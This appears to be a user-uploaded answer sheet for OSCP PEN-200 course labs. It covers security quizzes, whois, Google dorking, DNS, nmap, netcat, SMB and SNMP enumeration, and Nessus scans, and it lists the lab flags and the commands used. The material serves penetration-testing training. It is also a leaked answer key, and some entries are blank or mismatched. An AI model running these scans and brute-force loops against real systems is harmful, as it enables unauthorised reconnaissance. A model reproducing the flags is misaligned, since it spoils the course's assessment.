f46b733c-301d-402a-9b26-19bfa6fef489_OSCP_PEN-200_
Uploaded by
abdurasul.200303f46b733c-301d-402a-9b26-19bfa6fef489_OSCP_PEN-200_
Uploaded by
abdurasul.200303OSCP PEN-200
3.1.3. On Emulating the Minds of our Opponents
Labs
1. What two properties do adversaries have that make Cybersecurity particularly challenging? Enter your answer in the
form of a single character.
a. malice and vengeance
b. malice and intelligence
c. intelligence and generosity
d. pens and paper
Answer
b
2. The "Security Mindset" was first introduced by whom?
Answer
Bruce Schneier
3. Fill in the blank: Cybersecurity almost always requires reasoning under ________?
Answer
uncertainty
3.2.4. Recent Cybersecurity Breaches
Labs
1. What kind of attack takes over a computer or a set of computers and holds it hostage until the owner pays a fee?
Answer
Ransomware
2. Fill in the blank. Social Engineering generally exploits vulnerabilities in __________?
Answer
OSCP PEN-200 1
employees
3. Alice and Bob are two fictional characters often used to illustrate examples in cryptography. Other characters were
created to fulfill additional roles in these examples. What's the name of the character who is commonly used as the
"eavesdropper" in cryptography literature? You may need to do some additional research to answer this question.
Answer
eve
3.3.4. Balancing the Triad with Organizational Objectives
Labs
1. Which property of the CIA triad does having a reasonable password length policy help protect?
Answer
confidentiality
2. Which property of the CIA triad does a strong encryption algorithm help protect?
Answer
confidentiality
3. Which property of the CIA triad does hashing and checksums help protect?
Answer
Integrity
4. Bank Corp has a form on their website. The code that processes form submissions doesn't sanitize certain
parameters. This enables any user to change values stored in tables on a SQL database. As a result, the user can
change the amount of money that they have in their accounts. This is an example of a breach of which CIA triad
property?
Answer
Integrity
5. Acme Co accidentally left an AWS S3 bucket unsecured, which allowed anyone to access sensitive personally
identifiable data. This is an example of a breach of which CIA triad property?
Answer
confidentiality
6. Hope Hospital holds all of its data on a single server with no backups. One day, a janitor accidentally trips on the
cord, yanking it from the socket and disconnecting the server the staff relies on. This is an example of a breach of
which CIA triad property?
Answer
Availability
For the following questions, refer to this scenario:
In 2016, Linux Mint was compromised. The attackers were able to gain access to the web server that hosted their ISO
downloads, and replace them with different ISOs that contained backdoors installed on them. They also changed the
publicly visible checksums of the ISOs on the same site. The Linux Mint administrators identified the issue and resolved
it within 24 hours. Part of their discovery was that the ISOs and checksums, which were downloadable via a torrent (a
way to download a file on a peer-to-peer network), were not impacted by the breach.
7. Which part of the CIA triad was impacted when the attackers changed the ISO files on the website?
Answer
integrity
OSCP PEN-200 2
8. Which part of the CIA triad was impacted when the attackers gained access to the web server before any
modifications were made?
Answer
confidentiality
9. Suppose attackers decided to remove all critical files on a web server, preventing the server from functioning in the
intended way. Which part of the CIA triad would have been impacted?
Answer
availability
10. What part of the CIA triad is Linux Mint addressing by having two download locations?
Answer
availability
3.4.11. Logging and Chaos Testing
Labs
1. Which algorithm can be used to require multiple persons to attain authorization?
Answer
SSS
2. The 2019 Capital One attack was facilitated by not adhering to which important security principle?
Answer
Principle of Least Privilege
3. Fill in the blank: _____ _____ is a methodology that encourages unpredictable environments that impact security, to
provide teams and processes robust experience handling critical events.
Answer
Chaos testing
4. Which document is used to list and keep track of all assets within an organization?
Answer
inventory
5. BCP stands for what?
Answer
Business Continuity Planning
6. Thinking like the adversary and exploring the impacts of threat intelligence is called what?
Answer
Threat modeling
7. Each key should have how many purposes?
Answer
1
8. Which encryption protocol discussed in this Learning Unit uses ephemeral keys?
Answer
tls
9. Names, addresses, phone numbers, email addresses, and SSNs are all examples of what type of information?
OSCP PEN-200 3
Answer
pii
3.5.3. Anatomy of Cyber
Labs
1. Which rule under HIPAA is responsible for outlining how Electronic Protected Health Information should be protected?
Answer
Security Rule
2. True or false: GDPR applies to entities (companies, organizations, etc.) that are not located in the European Union but
collect data about EU citizens?
Answer
true
3. What is the name of the program that provides a standardized security framework for cloud services used by the
United States federal government?
Answer
FedRAMP
4. The ATT&CK and D3FEND frameworks are maintained by which organization?
Answer
MITRE
5. How many stages of attacker behavior are defined in the Cyber Kill Chain framework?
Answer
7
6. Which of the CIS Top 18 implementation groups is most strict?
Answer
IG3
3.6.4. Additional Roles
Labs
1. Which job role is primarily concerned with proactively identifying intruders on a network or set of systems?
Answer
Threat Hunter
2. Which job role requires a strong understanding of CI/CD pipelines?
Answer
DevSecOps
3. Which OffSec course deals with logical exploitation on macOS systems?
Answer
EXP-312
4.1.3. The Forgetting Curve and Cognitive Load
Labs
1. Most education research is focused on which group of individuals? Enter your answer in the form of a single
character.
OSCP PEN-200 4
A. School-aged children
B. Medieval trade smiths
C. Individuals who have already entered the workforce
D. Hackers
Answer
2. To help with retention, training materials may be presented in, for example, both text and video format. What is the
name of this method of learning?
Answer
Dual Coding
3. Ebbinghaus noted that after 20 minutes we forget roughly how much of what we learned. Enter your answer in the
form of a single character.
A. Less than 10% of information is lost.
B. About 40% of what we had memorized is gone.
C. 95% of all memorized information is gone after 20 minutes.
D. None. We can recall everything, but after 40 minutes, retention begins to fail.
Answer
b
4. The term "Cognitive Load" could be used to describe which of the following? Enter your answer in the form of a
single character.
A. The areas of domain expertise possessed by a single person.
B. The emotional weight carried by someone who "knows too much".
C. How hard it is to learn something.
D. The finite amount of material a learner can retain in a single study session.
Answer
d
4.2.3. The Challenges of Remote and Asynchronous Learning
Labs
1. This section included high-level overviews of a variety of different studies. What conclusion did these studies come
to? Enter your answer in the form of a single character.
A. There are small but notable differences between digital and print materials.
B. Context switching is difficult, so learning "screen things" on a screen may be preferable to learning them from a book.
C. The quality of the material matters much more than the format in which it is delivered.
D. All of the above
Answer
d
2. Which of the following statements about preparing for an evolving information security landscape is incorrect? Enter
your answer in the form of a single character.
A. Memorizing and following a checklist might be a good start, but we will need a more in-depth understanding of methodologies to evolve along with an ever-changing
landscape.
B. Even an "expert" in a particular Information Security area needs to constantly return to their area of expertise to learn and understand new techniques and methods.
C. Learners can only be prepared for the situations that are covered in their training.
D. Learning a Module like "Malware Analysis" has a lot in common with a Module like "Teamwork". In both cases, we can't predict the exact scenario in which the new skill
will be applied.
OSCP PEN-200 5
Answer
c
3. Which of the following statements about the challenge of remote, asynchronous learning is incorrect? Enter your
answer in the form of a single character.
A. There are more challenges for remote learners than for folks in more familiar, traditional classroom learning situations.
B. Connecting to a learning community, for example on Discord, can be a significant help.
C. Traditional classroom learners generally have a community of co-learners that is intrinsically available.
D. Without an instructor present, there's less responsibility on the learner.
Answer
d
4.3.4. Contextual Learning and Interleaving
Labs
1. What is meant by the term "Demonstration Method"? Enter your answer in the form of a single character.
A. The instructor assigns a quiz so that learners can demonstrate their skills.
B. The instructor models the skill the learner is hoping to learn.
C. The learner has to demonstrate competence before moving forward.
D. A learner demonstrates their current ability so that the instructor knows where to begin.
Answer
b
2. Which of the following activities with OffSec training materials does not allow learners to apply their skills in a
"hands-on" manner by themselves? Enter your answer in the form of a single character.
A. Following along on virtual machines that accompany written materials
B. Completing exercises on a virtual machine
C. Completing the Challenge Labs (virtual exercise environments) that accompany some courses
D. Watching video walkthroughs
Answer
d
4.4.4. Analyzing this Approach
Labs
1. Which of the following is not a strategy used in teaching this section?
A. Showing the solution first, then explaining why and how it works.
B. Running into problems so that we can see how troubleshooting works.
C. Including "extra" steps, like the verification that our solution was successful.
D. Modeling the thinking process required for solving the problem.
Answer
a
2. In this short Learning Unit, we focused on our central Module, the executable permission, but we also introduced and
discussed other commands that allowed us to copy files and list file properties. Including some additional items like this
is a strategy known as what?
A. Dual Coding
B. Interleaving
OSCP PEN-200 6
C. The Demonstration Method
D. Ebbinghaus' Forgetting Curve
Answer
3. At one point in this section, we tried running a command (chmod) on a file and it didn't work. Rather than quickly
abandoning this line of thinking, we tried running the exact same command on itself, which also didn't work. This type
of optimistic persistence is important to learn. OffSec has a two word name for this mentality. What is it?
Answer
try harder
4. Assume that in a normal Module, this material would have been accompanied by a virtual machine, which would have
allowed the learner to follow along. The approach used here addresses a number of the challenges discussed earlier in
this Module. While this example wasn't perfect, which challenge is definitely not addressed in this particular teaching
method (but can be addressed with the learner's approach to learning)?
A. A lack of hands-on opportunities that impedes retention.
B. Too much information at once, leading to cognitive load.
C. The difficulty of learning new things in the abstract, out of context.
D. An unfamiliarity with struggle and failure that leads to frustration when we inevitably encounter it later.
Answer
b
4.7.6. Study Your Own Studies
Labs
1. Take advantage of the "Notes" section here and write down a strategy that you believe will work for you. Click "Add
Note" and type out a description of what feels both hopeful and practical for you. Think about how often you'd like to
study and for how long. When you're done, save the note so that you can return to it later. Finally, enter the word
"planned" as the answer to this question.
Answer
planned
5.1.6. Tools to Take Screenshots
Labs
1. A penetration tester and their client should absolutely agree on what before the engagement starts?
Answer
RoE
2. What two words that end in "cise" are desirable properties of the general structure of penetration testing notes? Input
your answer in the form A and B .
Answer
concise and precise
3. The format of our notes for a web application test should include the application name, URL, issue detail, and proof of
concept payload. What else should we include?
Answer
Request Type
4. How many important concepts should be shown in a single screenshot?
OSCP PEN-200 7
Answer
1
5.2.7. Appendices, Further Information, and References
Labs
1. Who do we usually write the Penetration Testing Report for?
A. The Head of Cybersecurity
B. The CIO
C. The Security Operations Center Analysts
D. All of the above
Answer
d
2. What section should usually begin a Penetration Testing Report?
Answer
Executive Summary
3. What is the missing word in this sentence: Make sure that any solution given has a concrete and _________
implementation.
Answer
practical
6. Information Gathering
6.2.1. Whois Enumeration
Information Gathering - WHOIS Enumeration - VM #1
Information Gathering - WHOIS Enumeration - VM #2
Information Gathering - WHOIS Enumeration - VM #3
Labs
1. Start up VM #1 and perform a whois query against the
megacorpone.com domain using VM #1's IP address as WHOIS server. What is the hostname of the third Megacorp
One name server?
Answer
NS3.MEGACORPONE.COM
View hints
Refer to listing 2 and identify the command that can help you retrieve the hostname of the third nameserver
belonging to Megacorp One.
Command
whois megacorpone.com
2. Based on the previous question answer, what is the Registrar's WHOIS server?
Answer
whois.gandi.net
OSCP PEN-200 8
View hints
Use the command provided in listing 2 and execute it to retrieve the output. Look for the Registrar WHOIS Server
attribute in the output to find the information you need.
Command
whois megacorpone.com
3. Once you've started VM #2, perform a WHOIS query on the offensive-security.com domain against the machine's
IP. The flag can be found within the DNS section of the WHOIS record.
Answer
OS{ff8b884ae46f7553979ad71a24e9df44}
View hints
Analyze the command in listing 2 and make changes to execute a whois query for the "offensive-security.com"
domain.
Command
whois offensive-security.com -h 192.168.204.251
4. Once you've started VM #3, perform a WHOIS query on the offensive-security.com domain against the machine's
IP. What's the Tech Email address?
Answer
OS{68dd18dfd27c46346d486580469852c4}
View hints
Analyze the command in listing 2 and make changes to execute a whois query for the "offensive-security.com"
domain and search for tech email address.
Command
whois offensive-security.com -h 192.168.204.251
6.2.2. Google Hacking
Labs
1. What is the name of the VP of Legal for MegaCorp One?
Answer
Mike Carlow
OSCP PEN-200 9
View hints
1. Review the Google dork used in Figure 1 and modify it to include the intext operator.
2. Use the modified dork to search for the term VP Of Legal in the web pages related to Megacorp One.
Command
site:megacorpone.com title:VP of Legal
https://www.megacorpone.com/contact.html
2. What is the email address of the VP of Legal for MegaCorp One?
Answer
[email protected]
View hints
1. Review the Google dork used in Figure 1 and modify it to include the intext operator.
2. Use the modified dork to search for the term VP Of Legal in the web pages related to Megacorp One and
identify their email address.
Command
site:megacorpone.com name:Mike Carlow email:
https://www.megacorpone.com/contact.html
3. What other MegaCorp One employees can you identify that are not listed on www.megacorpone.com?
Answer
william adler
View hints
Use the search function on social media platforms (twitter, etc) to check for employees of Megacorp One.
Command
twitter social media ga kirib poiskga megacorpone deb qidirdim va menda @RealWillAdler shu inson chiqdi, BIO sini
o’qisam u hozirda ishlamayotgan ekan !
6.2.3. Netcraft
Labs
1. From your own Kali VM, use Netcraft to determine what application server is running on
www.megacorpone.com.
Answer
apache
View hints
1. Follow the steps provided in this learning unit to use “Netcraft” against the target website.
2. Review the output shown in Figure 8 and locate the section that displays the information related to the
application server being used by the website.
OSCP PEN-200 10
Command
https://searchdns.netcraft.com/
shu yerga www.megacorpone.com yozdim va scan qilib berdi
2. What is the name of the Client-Side Scripting Framework that handles fonts?
Answer
Font Awesome Web Fonts
View hints
1. Follow the steps provided in this learning unit to use “Netcraft” against the target website.
2. Review the output shown in Figure 8 and locate the section that pertains to the Client-Side Scripting Framework
that handles fonts used by the website.
Command
https://searchdns.netcraft.com/
shu yerga www.megacorpone.com yozdim va scan qilib berdi
3. What is the value of the IPv4 autonomous systems number that hosts www.megacorpone.com?AnswerView hints
Answer
AS16276
View hints
1. Follow the steps provided in this learning unit to use “Netcraft” against the target website.
2. Review the output shown in Figure 7 and locate the value of the IPv4 autonomous systems number.
Command
https://searchdns.netcraft.com/
shu yerga www.megacorpone.com yozdim va scan qilib berdi
OSCP PEN-200 11
6.2.4. Open-Source Code
Labs
1. Perform open-source recon on the MegaCorp One's GitHub repository and try to find user credentials. What is the
username associated with the discovered hash?
Answer
trivera
View hints
1. Follow the steps provided in this Section.
2. Review the output shown in Figure 11 and locate the relevant section that provides the information you need to
answer the question.
Command
2. What is the title of the secondary, placeholder, Megacorp One repository?
Answer
git-test
View hints
There is a second repository listed on the MegaCorp One GitHub profile.
Command
Living off the Land - Yerdan tashqarida yashash
OSCP PEN-200 12
6.3.1. Passive LLM-Aided enumeration
Labs
1. Ask ChatGPT: "What is the WHOIS information for the domain megacorpone.com?" Based on the response, who is
listed as the registrant of megacorpone.com?
A) Alan Grofield
B) Joe Sheer
C) Matt Smith
D) Tanya Rivera
Answer
Alan Grofield
View hints
no hints
Command
OSCP PEN-200 13
2. Based on the previous GPT output, what is the domain statu s of megacorpone.com?
A) Active
B) Pending Transfer
C) clientTransferProhibited
D) Expired
Answer
clientTransferProhibited
View hints
no hints
Command
OSCP PEN-200 14
3. Ask ChatGPT "Can you generate the best Google dorks for the website megacorpone.com?"
Based on the response, which Google dork, according to ChatGPT, identifies subdomains of megacorpone.com?
A) site:megacorpone.com -www
B) site:megacorpone.com filetype:pdf
C) site:megacorpone.com ext:yaml
D) site:*.megacorpone.com
Answer
View hints
no hints
Command
no commands
4. Ask ChatGPT: "What public information is available about the leadership of MegacorpOne.com and their social
media presence?"
Based on the output, what is the Twitter handle of the CEO of MegaCorp One?
A) @Joe_Sheer
B) @MattSmithMCO
C) @TanyaRiveraMCO
D) @TomHudsonMCO
Answer
View hints
OSCP PEN-200 15
no hints
Command
5. Ask ChatGPT: "Can you provide the top Google dorks to search for exposed repositories related to
megacorpone.com?"
Which Google dork can help identify exposed source code repositories for megacorpone.com?
A) site:megacorpone.com "gitlab" | "github"
B) site:megacorpone.com inurl:"login"
C) site:megacorpone.com ext:log
D) site:megacorpone.com filetype:sql
Answer
View hints
no hints
Command
OSCP PEN-200 16
6. Ask ChatGPT "Can you provide advanced passive enumeration techniques for identifying potential subdomains on
megacorpone.com?"
Which tool, combined with ChatGPT's suggestions, could enhance subdomain enumeration results?
A) Sublist3r
B) Metasploit
C) Nessus
D) Hydra
Answer
a
View hints
no hints
Command
no commands
6.4.1. DNS Enumeration
Information Gathering - DNS Enumeration - Walk Through - VM Group 1
OSCP PEN-200 17
Labs
1. Perform a DNS enumeration on the MX records of megacorpone.com: which is the second-to-best priority value
listed in the reply? The DNS priority it's a 2-digit number and lower priority values indicate higher preference.
Answer
20
View hints
1. Use the command provided in listing 6 and look at the priority values of the MX records.
2. The answer to the question should be in the format of handled by X where X is the specific answer.
Command
host -t mx megacorpone.com
2. How many TXT records are associated with the megacorpone.com domain?
Answer
View hints
Use the command provided in listing 7 to gather the information you need to answer the question.
Command
host -t txt megacorpone.com
3. Automate the DNS enumeration of the megacorpone.com domain with DNSEnum. What is the IP of
the siem.megacorpone.com host?
Answer
51.222.169.215
View hints
Use the command provided in listing 16 to automate DNS enumeration and gather the information you need to
answer the question.
Command
dnsenum megacorpone.com
OSCP PEN-200 18
4. Power up 'Walk Through VM Group 1', connect to the Windows 11 Client (using xfreerdp), and enumerate the
DNS megacorptwo.com and its subdomains through nslookup as illustrated in this section. What text is contained within
the TXT record of the info.megacorptwo.com domain?
Answer
greetings from the TXT record body
View hints
1. Use the command provided in listing 19 to obtain the TXT record for a specific IP address, adjusting the IP
address based on your actual exercise VM.
2. Make sure to submit the answer without quotes.
Command
nslookup -type=TXT info.megacorptwo.com 192.168.50.151
6.4.2. TCP/UDP Port Scanning Theory
Walk Through Exercises - Information Gathering - Port Scanning Theory - VM Group 1
Labs
1. Once VM Group 1 is started, perform a Netcat scan against the machine ending with the octet '151' (ex: 192.168.51.151)
Which is the lowest TCP open port?
Answer
53
View hints
Use the command provided in listing 20 and make changes with the relevant options and arguments as needed to
perform the desired task.
Command
nc -nvv -w 1 -z 192.168.204.151 1-100
2. On the same host, perform a netcat TCP scan for the port range 1-10000. Which is the highest open TCP port?
Answer
9389
View hints
OSCP PEN-200 19
Use the command provided in listing 20 and make changes with the relevant options and arguments as needed to
perform the desired task.
Command
nc -nvv -w 1 -z 192.168.204.151 9300-9400
3. Other than port 123, what is the first returned open UDP port in the range 150-200 when scanning the machine
ending with the octet '151' (ex: 192.168.51.151)?
Answer
161
View hints
Use the command provided in listing 21 and make changes with the relevant options and arguments as needed to
perform the desired task.
Command
nc -nv -u -z -w 1 192.168.204.151 150-200
6.4.3. Port Scanning with Nmap
Information Gathering - Port Scanning - Module Exercises - VM #1
Information Gathering - Port Scanning - Walk Through Exercises - VM Group 1
Information Gathering - Port Scanning - Module Exercises - VM Group 1
Labs
1. Start Walk Through Exercises in VM Group #1, use Nmap to conduct a SYN stealth scan of your target IP range, and
save the output to a file. Use grep to show machines that are online. Which host has port 25 open? Use
50 as the third IP octet instead of your dynamically assigned IP when submitting the answer.
Answer
192.168.50.8
View hints
1. Start Walk Through Exercises - VM Group 1.
2. Use Nmap to SYN scan on the entire subnet for port 25 open, using the command in listing 26.
3. Update the IP address to 192.168.50.0/24 to scan the entire subnet (adjust the third octet accordingly).
Command
nmap -sS -p 25 --open -T4 192.168.153.0/24
OSCP PEN-200 20
2. Perform an Nmap TCP scan against the addresses on the Walk Through Exercises on VM Group #1. Which host is
running a WHOIS server? Use 50 as the third IP octet instead of your dynamically assigned IP when submitting the
answer.
Answer
192.168.50.251
View hints
1. By default the port used for the whois service is port 43.
2. Use the command provided in listing 25 to perform a port scan on an entire subnet for whois service using "-p"
to specify TCP port. (Update the third octet accordingly)
Command
nmap -sS -p 43 --open -T4 192.168.153.0/24
3. Connect via RDP to the Windows 11 client from Walk Through Exercises VM Group #1 and perform TCP port discovery
against the Windows DC machine ending with the octet '151' (ex: 192.168.51.151). Which are the first four open TCP
ports? List the ports separated by commas.
Answer
53,88,135,139
View hints
Use the command provided in listing 40 to see the open ports, adjusting the IP address based on your actual
exercise VM.
Command
nmap -sS --open 192.168.153.151
OSCP PEN-200 21
4. There is a service running on a high-range TCP port on the Module Exercises VM #1. Find it, and you will find the flag
together with it.
Answer
OS{400d6e5f645646fb22da0b954c71e73e}
View hints
1. Perform an Nmap scan to identify the highest TCP port in the range of 50000-60000 by specifying the "-p" flag
on your command.
2. Once you have identified the open port in a given range, try connecting to it using "nc" to read the flag.
Command
nmap -sS -p 50000-60000 -T4 192.168.153.52 -Pn
nc -nv 192.168.153.52 59811
5. The NMAP Scripting Engine includes a many extremely useful scripts to assist in the active recon process for a wide
variety of things, not just the handful of services discussed in this Module. In the NMAP library, for example, there are
over 100 NSE discovery scripts. For this challenge, you will need to use a new discovery script to help you enumerate
the HTTP title of the default page of all the hosts with web servers on the public lab network. Performing something as
simple as scanning the web server titles can help you collect all sorts of information about the target, including the
purpose of the website, software version information, and even login pages. In this challenge, you need to find the host
with a web server with the title "Under Construction" in the Module Exercises VM Group 1. The flag is located on
the index.html page of the web server matching this title.
Answer
OS{6cab149f52c24e1894110fc972315fb0}
View hints
1. Use a discovery script that contains http and title in the name.
2. Try using locate or ls and grep to find the script.
Command
nmap -T4 --script http-title 192.168.153.0/24
OSCP PEN-200 22
6.4.4. SMB Enumeration
Walk Through - Information Gathering - SMB Enumeration - VM Group 1
Topic Exercises - Information Gathering - SMB Enumeration - VM Group 1
Labs
1. Power on the Walk Through VM Group 1 and use Nmap to create a list of the SMB servers in the VM Group 1. How
many hosts have port 445 open?
Answer
10
View hints
1. Use the command provided in listing 41 to scan for SMB servers, adjusting the third octet.
2. Utilize text processing tools such as "cut" , "grep" and "wc" or similar to count IP addresses with open SMB
ports
Command
nmap -T4 -p 445 --open 192.168.153.0/24
2. On the same group, connect to the Windows 11 client and repeat the shares enumeration against dc01 via the net
view command. What are the three reported admin shares? List them separated by commas.
Answer
ADMIN$,C$,IPC$
View hints
RDP to the target machine, and view the shared resources using the command provided in listing 45.
Command
net view \\dc01 /all
OSCP PEN-200 23
3. Server message block (SMB) is an extremely important service that can be used to determine a wealth of information
about a server, including its users. Start up Topic Exercise VM Group 1 and use Nmap to identify the lab machines
listening on the SMB port and then use enum4linux to enumerate those machines. In doing so, you will find a machine
with the local user alfred. The flag is located in the comments on one of the SMB shares of the host that has
the alfred user.
Answer
OS{9a0c99b70b6273e2a497e5ea2108d67b}
View hints
NO HINTS
Command
nmap -sV -v -p 139,445 --script smb-os-discovery 192.168.153.0/24
enum4linux -S 192.168.153.13
6.4.5. SMTP Enumeration
Walk Through Exercises - Information Gathering - SMTP Enumeration - VM Group 1
Labs
1. Power on the Walk Through Exercises VM Group 1 and search your target network range to identify any systems that
respond to SMTP. Once found, open a connection to port 25 via Netcat and run
VRFY command against the root user. What reply code does the SMTP server send as a response?
Answer
252
View hints
1. Perform an Nmap scan specifically for the tcp 25(SMTP) on the entire subnet and see which one has "open"
status.
OSCP PEN-200 24
2. Use "nc" to your advantage to see the "banner"
Command
nmap -sV -p 25 -T4 --open 192.168.153.0/24
nc -nv 192.168.153.8 25
6.4.6. SNMP Enumeration
Information Gathering - SNMP Enumeration - Walk Through Exercises - VM Group 1
Labs
1. Scan your target network on VM Group 1 with onesixtyone to identify any SNMP servers. Once done, list all the
running process on the only Windows host that is running an SNMP server. What is the full name of the SNMP server
process?
Answer
snmp.exe
View hints
1. Use the commands provided in listing 53 to find the SNMP servers on the range, adjusting the third octet.
2. Use the command provided in listing 56 to identify the specific server process for SNMP.
Command
echo public > community
echo private >> community
echo manager >> community
for ip in $(seq 1 254); do echo 192.168.50.$ip; done > ips
onesixtyone -c community -i ips
snmpwalk -c public -v1 192.168.50.151 1.3.6.1.2.1.25.4.2.1.2
OSCP PEN-200 25
2. On the same Windows host, run one of the SNMP query we have already explored in this section. This time
appending the -Oa parameter to the command. This parameter will automatically translate any hexadecimal string into
ASCII that was otherwise not decoded. What is the first Interface name listed in the output?
Answer
Software Loopback Interface 1.
View hints
The command to use is shown in listing 54 with the exception of changing the IP address and adding -Oa.
Command
snmpwalk -c public -v1 -t 10 192.168.153.151 -Oa
7. Vulnerability Scanning
7.1.1. How Vulnerability Scanners Work
Labs
1. Is this a false positive or a false negative? A vulnerability
scanner identifies a vulnerability for a Linux web server. The target
runs on Windows and the vulnerability is only exploitable on Linux.
Answer
false positive
2. Is this a false positive or a false negative? A vulnerability
scanner detects the wrong version of an FTP service. The detected
version has no vulnerabilities, but the running FTP service is
vulnerable.
OSCP PEN-200 26
Answer
false negative
7.1.2. Types of Vulnerability Scans
Labs
1. Do you need to perform an authenticated or an unauthenticated
vulnerability scan in the following scenario? You want to determine if
all current patches on a Linux system are installed.
Answer
authenticated
2. Do you need to perform an authenticated or an unauthenticated
vulnerability scan in the following scenario? You want to analyze
the perimeter of a server on the internet from the perspective of a
malicious actor.
Answer
unauthenticated
7.1.3. Things to consider in a Vulnerability Scan
Labs
1. Is the following statement true or false? A vulnerability scan can
never impact the stability of a target system or service.
Answer
false
2. Is the following statement true or false? Rate limiting can be the
reason that a vulnerability scanner can flag a live target system as
offline.
Answer
true
7.2.1. Installing Nessus
Labs
1. Follow the steps above to install Nessus Essentials. What is the
command to start the nessusd service after a successful installation
from an unprivileged account?
Answer
sudo systemctl start nessusd.service
View hints
1. Remember, starting a service typically requires administrative
privileges. Which command is commonly used in Linux to execute
commands with superuser privileges?
2. Review the command provided in listing 3 for starting Nessus.
7.2.2. Nessus Components
Labs
1. What is the third group of template categories: DISCOVERY,
COMPLIANCE and __________?
OSCP PEN-200 27
Answer
Vulnerabilities
View hints
Nessus already provides a broad variety of scanning templates for us to use. These templates are grouped into the
three categories Discovery, ... , and Compliance.
2. Go to the Settings tab in Nessus then click on the Advanced
settings. Find how many concurrent web users are allowed with the
default settings.
Answer
1024
View hints
1. In advanced settings, focus on user management or concurrent access
settings.
2. Seek an answer starting with ""maximum"" and ensure the value
relates to "web users."
7.2.3. Performing a Vulnerability Scan
Vulnerability Scanning - Performing a Vulnerability Scan - VM Group 1
Labs
1. Follow the steps above to create your own unauthenticated
vulnerability scan on ports 80 and 443 on the machines from VM Group
2. Review the REPORT menu of the scan configuration, which is
shown in Figure 13 and check what is the
only enabled option in the
Output section. Enter the name of the
activated checkbox.
Answer
Allow users to edit scan results
View hints
1. Ensure you're viewing 'REPORT' menu (see Figure 13) and Focus on
the 'Output' section.
2. Find the checkbox related to user permissions and scan results
used.
Command
OSCP PEN-200 28
7.2.4. Analyzing the Results
Vulnerability Scanning - Performing a Vulnerability Scan - VM #5
Vulnerability Scanning - Analyzing the Results - VM Group 1
Labs
1. In the section "Performing a Vulnerability scan" we launched a
vulnerability scan on four target machines. Follow the steps outlined
in this section to review the results of this scan and analyze the
Apache 2.4.49 < 2.4.51 Path Traversal Vulnerability finding.
The finding contains a field named
Exploit Code Maturity. Enter the
value of this field as an answer to this exercise.
Answer
Functional
View hints
1. After Performing a vulnerability scan, navigate to the 'VPR Top
Threats' tab for vulnerability details.
2. Locate and examine 'Apache 2.4.49 < 2.4.51 Path Traversal
Vulnerability' for an 'Exploit Code Maturity' attribute.
Command
OSCP PEN-200 29
2. Perform an unauthenticated vulnerability scan on the same four
machines (VM Group 1) as in the previous exercise, but only scan port
8080. Once the scan finishes, review the scan results and identify a
host with the grouped finding
HTTP (Multiple Issues). Find HTTP
Server Type and Version
and enter the Jetty version found.
Answer
9.4.43.v20210629
View hints
1. After performing a vulnerability scan in port 8080 (VM Group 1),
find a host issue labeled 'HTTP (Multiple Issues)' in the results.
2. Identify the web server type, and find the version.
Command
3. Nessus can build a Sitemap of a target web server. A Sitemap
provides information about the content of a web server (e.g. pages).
Nessus builds it by crawling through links it identifies on pages.
Scan the four target machines ( VM Group 1) on port 9999 with
the
Basic Network Scan template. To configure Nessus to build a
Sitemap, click on the
OSCP PEN-200 30
Assessment settings in the scan configuration
and select
Custom in the dropdown menu. Next, click on Web
Applications
and activate Scan web applications. After this, launch
the scan. Once it is finished, review the results and analyze the
findings on the
Web Application Sitemap . The output provides a list
of found pages. On one of these pages, you will find the flag.
Answer
OS{cb161850e0a8b773044536b6e32c7d74}
View hints
1. Find 'Web Application Sitemap' for discovered URLs.
2. Identify the URL ending with 'flag.html' in the list.
3. Access issues? Clear cache/cookies or use a private/incognito
window.
Command
http://192.168.240.13:9999/flag.html
4. The victim machine VM #5 is running a server that contains several
vulnerabilities. One vulnerability allows for directory traversal and
arbitrary file access on the target system. Use Nessus to perform a
Basic Network Scan of the victim. Make sure to configure the scan to
assess
all ports. Once the scan is completed, examine the discovered
vulnerability in the results. As a part of the scan, Nessus was able
to read the file
C:\Windows\win.ini as a proof of concept of this
exploit. Expand the vulnerability results to view the full content of
the retrieved file and locate the embedded flag.
Answer
OS{e07dbc8ffb39509d41cee38058e07605}
OSCP PEN-200 31
View hints
1. After the scan, seek directory traversal/file access
vulnerabilities.
2. Find details and content of C:\Windows\win.ini within the specified
vulnerability.
3. Focus on text between lines labeled 'snip' in the file content for
the flag.
Command
7.2.5. Performing an Authenticated Vulnerability Scan
Vulnerability Scanning - Authenticated Scan - VM #1
Labs
1. Follow the steps above to perform an authenticated vulnerability
scan on VM #1. Review the results of the scan and analyze the "Patch
Report" finding. The report identifies missing patches, with one
specifically related to the
Heimdal package. Can you provide the
corresponding
Ubuntu Security Notice (USN) number?
Answer
USN-5849-1
View hints
1. Consider using a search function (e.g., control/command + F) to
help filter through the findings quickly.
Command
eng tez respons qaytargani javobi (EPSS) = 0.0007
OSCP PEN-200 32
2. Additionally, analyze the "OS Identification and Installed Software
Enumeration over SSH v2 (Using New SSH Library)" finding. The finding
includes the output of the
uname -a command. What is the kernel
version of the
DESKTOP system?
Answer
5.4.0-42-generic
View hints
1. After the scan, visit the 'Vulnerabilities tab' and find the
vulnerability from the specified plugin.
2. Find the answer following: 'The output of "uname -a" is:' in the
output section.
Command
7.2.6. Working with Nessus Plugins
Vulnerability Scanning - Working with Nessus Plugins - VM #1
Vulnerability Scanning - Working with Nessus Plugins - VM #2
OSCP PEN-200 33
Labs
1. Follow the steps above to perform the vulnerability scan on VM #1
with the specified plugin filter. Click on the vulnerability provided
by the plugin on the
Vulnerabilities result page and enter the date
when a patch for this vulnerability was published. The information can
be found in the
Vulnerability Information area under the Patch Pub
Date
on the right sidebar.
Answer
January 26, 2021
View hints
1. Explore the 'Vulnerabilities tab' after the scan, focusing on 'High
Severity' labels.
2. Dive into the 'Vulnerability Information' of the specified plugin's
vulnerability.
3. Locate 'Patch Pub Date' in the sidebar within the 'Vulnerability
Informatio
Command
2. The target machine VM #2 is running an IIS web server. Perform an
Advanced Dynamic Scan on this system with the default settings of
this template and specify the Plugin ID
11714 in a Plugin Filter.
Once the scan completes, examine the discovered information and
locate the flag embedded in the disclosed path. Keep in mind, that
Nessus shows some special characters like "{" or "}" as
Unicode Hex
characters
. To provide the correct flag, you will need to substitute
these characters.
Answer
OS{ac053fa38657695f5895baa34ab454c4}
View hints
1. Look for a vulnerability titled 'Nonexistent Page (404) Physical
Path Disclosure' in 'Vulnerabilities'.
2. Find the line starting with 'Path disclosed' in the details of that
vulnerability.
Command
OSCP PEN-200 34
7.3.1. NSE Vulnerability Scripts
Vulnerability Scanning - NSE Vulnerability Scripts - VM #1
Labs
